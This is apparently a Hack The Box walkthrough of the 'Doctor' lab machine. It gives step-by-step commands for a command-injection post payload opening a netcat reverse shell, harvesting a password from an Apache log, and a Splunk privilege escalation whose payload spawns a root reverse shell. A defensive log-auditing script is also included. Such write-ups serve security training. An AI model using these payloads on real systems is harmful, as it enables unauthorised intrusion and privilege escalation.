Gagan Khunteta
6 min read · Jan 4, 2021


Doctor Walkthrough Hack The Box

Lab IP: 10.10.10.209

First of all, open your terminal and type “ping 10.10.10.209”. If you see a response, your connection to the lab is working and you can start.

Now, if your terminal is not running as super user/root, switch to root using “sudo su”. Once you have root privileges, type “nano /etc/hosts”; your screen will look like this:

Type “10.10.10.209” (space) Doctors.htb. This maps the name Doctors.htb to 10.10.10.209 on your machine, so you can reach the box by typing Doctors.htb in your browser. Then press “Ctrl + o” to write the file and “Ctrl + x” to exit.

Now open your browser and go to Doctors.htb; your screen will look like this:

Now click Register at the top right corner and fill in any details to create a login.

Click Sign Up; your account will be created. Then log in with the same credentials. After login your screen will look like this:

Now go to New Message at the top right; your screen will look like this:

Now open your terminal and type “nc -nlvp 1234” (you can use any port). This NetCat command listens on port 1234 for the incoming connection:

Now, in a new terminal, type “ifconfig” to see your IP address. Look at the tun0 interface: this is the IP provided by Hack The Box, because we are connected to the Hack The Box VPN and our IP there is different. Select and copy that IP.

Now go back to your browser, type “Getting Shell” in Title, and in Content type “<img src=http://10.10.14.33/$(nc.traditional$IFS-e$IFS/bin/bash$IFS'10.10.14.33'$IFS'1234')>”. Here “10.10.14.33” is my VPN IP; put your own IP there. After you click Post, the terminal where we ran the NetCat command will show “Connect to (Your IP) from unknown”.

Now type “python3 -c 'import pty;pty.spawn("/bin/bash")'”. After this command you will have a proper shell as “web@doctor”.

Now type “cd ..”; this takes you to the “home” directory. Check what is inside it using “ls” (shaun, web):

Now use “cd /var/log/apache2” to go inside the “apache2” folder. Type “ls” to list what is inside; here you will see a file named “backup”.

Let’s check what is inside “backup” using “cat backup”. The screen will fill with log lines, so we need a way to find the email and password used for login: type “grep -r password?email”. “grep” searches a file for a string of characters, and “-r” makes the search recursive through directories.

After this command a line will appear that contains our password: “Guitar123”.
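As an added, defender-side example (not code from the original post): both things this walkthrough relies on, a shell command substitution smuggled into a request and a password that ended up in an Apache log, leave traces in the access log. The script below, run over constructed sample lines, flags credentials sent as query parameters and shell metacharacters in request targets; the function and parameter names are my own.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache access-log lines (not taken from the box). Line 2 carries a
# password-reset request that puts the credential in the query string; line 3
# carries shell command substitution with $IFS used as a whitespace stand-in.
SAMPLE_LOG = """\
10.10.14.33 - - [05/Sep/2020:11:17:34 +0200] "GET /static/main.css HTTP/1.1" 200 1189 "-" "Mozilla/5.0"
10.10.14.33 - - [05/Sep/2020:11:17:51 +0200] "GET /reset_password?email=shaun@doctors.htb&password=EXAMPLE_ONLY HTTP/1.1" 500 453 "-" "Mozilla/5.0"
10.10.14.33 - - [05/Sep/2020:11:18:01 +0200] "GET /$(uname$IFS-a) HTTP/1.1" 404 274 "-" "curl/7.68.0"
"""

# Combined log format: client, identd, user, [timestamp], "METHOD target proto", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Query parameters that should never travel in a URL (and so never land in a log).
SENSITIVE_PARAMS = {"password", "passwd", "pwd", "token", "secret"}
# Shell constructs that have no business in a request target.
SHELL_RE = re.compile(r"\$\(|`|\$IFS|\$\{IFS\}")


def audit_log(text):
    """Return (kind, client_ip, target, details) for each suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed lines rather than abort the audit
        target = m.group("target")
        params = parse_qs(urlsplit(target).query)
        leaked = sorted(k for k in params if k.lower() in SENSITIVE_PARAMS)
        if leaked:
            findings.append(("credential_in_url", m.group("ip"), target, leaked))
        if SHELL_RE.search(target):
            findings.append(("shell_metachars", m.group("ip"), target, []))
    return findings


if __name__ == "__main__":
    for kind, ip, target, details in audit_log(SAMPLE_LOG):
        print(f"{kind:18} {ip:14} {target} {details}")
```

The lasting fix for the leak is to carry credentials in POST bodies and strip query strings from access logs; the fix for the injection is to never pass user-controlled text through a shell.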

Now let’s switch from web@doctor to the user shaun using “su shaun”. It will ask for a password; type the one we found above, “Guitar123”.

Now press Enter.

You can see “web@doctor” change to “shaun@doctor”. Now go to shaun’s home with “cd /home/shaun” and type “ls” to list the files; we can see user.txt. Let’s try “sudo -l”, which lists the commands this user is allowed to run with sudo. It will ask for a password; enter “Guitar123”. It shows an error, so we cannot go that way and will have to use another method:

Now let’s scan “10.10.10.209” with nmap: type “nmap -sC -sV -A -oN scan.txt 10.10.10.209”. This saves the output to a file named “scan.txt” in the directory you run it from and shows which services we may be able to use to get access:

Open “scan.txt”.

Here we can see “Splunk”. Let’s search Google for “Splunk privilege escalation”; a GitHub link appears at the top. Open it, copy the repository URL and clone it using “git clone <url>”. Now, in a new terminal, enter this folder with “cd SplunkWhisperer2”:

Now type “cd PySplunkWhisperer2” and press Enter. This folder contains the Python program we will use to get our flag, but first we have to install its requirements. This is done with “pip”, which installs and manages additional libraries and dependencies that are not part of the standard library. Type “pip install -r requirements.txt”; this might take a while depending on your internet connection:

While the requirements are installing, open a new terminal. We need a second listener to receive the root shell, so type “nc -nlvp 1232” (any port except the one already in use, 1234).

Once the install has completed, type the following command to gain access (root privileges are necessary, hence sudo): “sudo python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.14.33 --username shaun --password Guitar123 --payload 'nc.traditional -e /bin/sh 10.10.14.33 1232'”. Replace 10.10.14.33 with your VPN IP and 1232 with the port you chose, then press Enter:

In the terminal where we started the second NetCat listener we see “connect to (IP) from (unknown)”. Now type “python3 -c 'import pty;pty.spawn("/bin/bash")'” and press Enter; you now have access as “root@doctor”. Go to the root directory with “cd /root”:

Type “ls” here and you will see “root.txt”. This text file contains our flag, which can be read with “cat root.txt”.

Thank You for Reading

Please Share your view 🙂
